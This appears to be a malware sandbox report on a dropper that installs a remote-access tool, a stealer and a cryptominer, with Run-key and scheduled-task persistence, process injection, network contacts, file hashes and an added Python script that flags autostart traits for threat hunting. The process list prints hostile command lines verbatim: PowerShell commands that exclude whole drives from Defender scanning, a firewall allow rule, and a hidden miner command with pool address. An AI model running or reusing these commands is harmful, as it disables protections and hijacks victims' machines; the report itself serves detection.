Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
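
The Startup-folder drop and the two Run values above share three traits worth turning into a hunting rule: every autostart entry points back at server.exe in the user's Temp directory, the entry name is a 32-hex-character string, and the Run value passes ".." as the program's only argument. The second Run value sits under HKLM\SOFTWARE\Wow6432Node, which can only be written with administrative rights. The Python below is an added example for this page, not part of the sandbox report or the sample: it parses those rows as the sandbox prints them (the REG_SZ value is printed C-escaped, with \" and \\), unescapes the value and flags each trait. Rows are copied from this page; rule names are this example's own.

```python
import re

# Rows copied from the "Drops startup file" and "Adds Run key" tables above;
# constructed input for this example.
ROWS = [
    r'File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe C:\Users\Admin\AppData\Local\Temp\server.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe',
]

RUN_ROW = re.compile(r'^Set value \(str\) (?P<key>\\REGISTRY\\\S+?\\Run)\\(?P<name>\S+) = "(?P<value>.*)" (?P<proc>\S+)$')
FILE_ROW = re.compile(r'^File created (?P<path>.*?\.exe) (?P<proc>\S+)$')
HEX32 = re.compile(r'^[0-9a-f]{32}$', re.I)
USER_TEMP = re.compile(r'\\Users\\[^\\]+\\AppData\\Local\\Temp\\', re.I)
STARTUP_DIR = re.compile(r'\\Start Menu\\Programs\\Startup\\', re.I)

def unescape(value):
    """Undo the sandbox's C-style escaping of a REG_SZ value (\" and \\)."""
    return value.replace('\\"', '"').replace('\\\\', '\\')

def split_command(value):
    """'"C:\\dir\\x.exe" args' or 'x.exe args' -> (image, args)."""
    m = re.match(r'"([^"]+)"\s*(.*)$|(\S+)\s*(.*)$', value)
    return (m.group(1) or m.group(3)), (m.group(2) or m.group(4) or "")

def classify(row):
    """Return a record with findings for a Run-key or file-drop row, else None."""
    findings = []
    m = RUN_ROW.match(row)
    if m:
        image, args = split_command(unescape(m["value"]))
        findings.append("run_key_autostart")
        if m["key"].upper().startswith(r"\REGISTRY\MACHINE"):
            findings.append("machine_hive_run_key")   # write needed admin rights
        name = m["name"]
        record = {"kind": "registry", "name": name, "image": image, "args": args}
    else:
        m = FILE_ROW.match(row)
        if not m:
            return None
        image, args = m["path"], ""
        name = image.rsplit("\\", 1)[-1]
        findings.append("startup_folder_drop" if STARTUP_DIR.search(image) else "file_drop")
        if USER_TEMP.search(m["proc"]):
            findings.append("dropped_by_user_temp_process")
        record = {"kind": "file", "name": name, "image": image, "args": args}
    if HEX32.match(name.rsplit(".", 1)[0]):
        findings.append("hex32_name")
    if USER_TEMP.search(image):
        findings.append("autostart_image_in_user_temp")
    if args.strip():
        findings.append("launch_args:" + args.strip())
    record["findings"] = findings
    return record

def triage(rows):
    return [r for r in map(classify, rows) if r]

if __name__ == "__main__":
    for rec in triage(ROWS):
        print(rec["kind"], rec["name"], rec["findings"])
```

The same traits map directly onto host telemetry: a Run value (Sysmon event 13) or Startup-folder file create (event 11) whose target lives under %LocalAppData%\Temp and whose name is 32 hex characters is rare on clean machines and cheap to alert on.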

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1124 set thread context of 1640 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe C:\Windows\explorer.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1752 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1752 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 828 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 1852 wrote to memory of 1044 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1044 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 1080 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1080 wrote to memory of 740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 948 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1044 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 812 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 812 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 752 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1556 wrote to memory of 1124 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1124 wrote to memory of 1152 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1152 wrote to memory of 1828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 1576 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1152 wrote to memory of 1704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 1640 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86523374.exe

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

"C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1640 -s 124

Network

Country Destination Domain Proto
US 8.8.8.8:53 freegeoip.app udp
US 188.114.96.0:443 freegeoip.app tcp
RU 82.202.167.67:7790 tcp

Files

\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 364b3ef0a60761c536dee773743ae5a4
SHA1 3d2ec3d184b9d4438870e22f81da729a46db53bc
SHA256 c561ecd0e2448e975e0af302b5c2fa10b0d34ac2be3edb1950eedda7542269f2
SHA512 d9f3d06976b683a8023b94ea66fd51e2e225b6a4d7976cd17bff5e1e89b42b730f91ee07658273d4ea04aab8f86230ef1e1de3ac109cbbdbc0c3eb8be00adf5f

C:\Windows\System32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 42dc9eba47410301406c4e54ad8a114c
SHA1 ec2a755c3901e60fa183cfdb05d409431972d73a
SHA256 96821d8abac10c96ed171bc7158ff9b35a602b53f0da91dd13f0e7b2b7a85ad6
SHA512 a1e21aa88cbec4227b691e4c2bbc33b5e523bb2b210830e1469cde8aca0969b38981f138ada7f48115637d6392fc8c822dd997d9b72d7b45d7f79077900ac36e

\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 943c340e0da33f95572f0beb0fdf875b
SHA1 d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA512 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
